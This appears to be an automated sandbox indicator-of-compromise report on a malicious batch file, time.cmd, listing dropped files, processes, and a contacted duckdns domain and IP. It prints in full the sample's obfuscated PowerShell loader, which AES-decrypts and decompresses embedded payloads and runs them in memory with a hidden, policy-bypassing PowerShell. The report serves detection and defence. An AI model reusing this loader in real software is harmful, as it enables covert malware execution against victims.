IOC Report
time.cmd

loading gif

Files

File Path
Type
Category
Malicious
time.cmd
ASCII text, with very long lines (58328), with CRLF line terminators
initial sample
 malicious
\Device\ConDrv
ASCII text, with very long lines (1902), with CRLF line terminators
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2le2y0s3.ljd.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sfhuga24.pdv.ps1
ASCII text, with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\time.cmd" "
 malicious
C:\Windows\System32\cmd.exe
cmd /c "set __=^&rem"
 malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('76J7bEzHtX3VLkuJZ3oCAIh8u4PXgvIrPrnTbE0uYjM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PvXjXUmyPwzlCxyLb5VMvA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $WAoSC=New-Object System.IO.MemoryStream(,$param_var); $DqjpG=New-Object System.IO.MemoryStream; $gTgrK=New-Object System.IO.Compression.GZipStream($WAoSC, [IO.Compression.CompressionMode]::Decompress); $gTgrK.CopyTo($DqjpG); $gTgrK.Dispose(); $WAoSC.Dispose(); $DqjpG.Dispose(); $DqjpG.ToArray();}function execute_function($param_var,$param2_var){ $KJzOY=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $SIuiX=$KJzOY.EntryPoint; $SIuiX.Invoke($null, $param2_var);}$psbhS = 'C:\Users\user\Desktop\time.cmd';$host.UI.RawUI.WindowTitle = $psbhS;$KrZUn=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($psbhS).Split([Environment]::NewLine);foreach ($gGiAE in $KrZUn) { if ($gGiAE.StartsWith('zVnkucItcDIJmveRwHFJ')) { $FQbRn=$gGiAE.Substring(20); break; }}$payloads_var=[string[]]$FQbRn.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
 malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Domains

Name
IP
Malicious
x5387400.duckdns.org
12.202.180.134
 malicious

IPs

IP
Domain
Country
Malicious
12.202.180.134
x5387400.duckdns.org
United States
malicious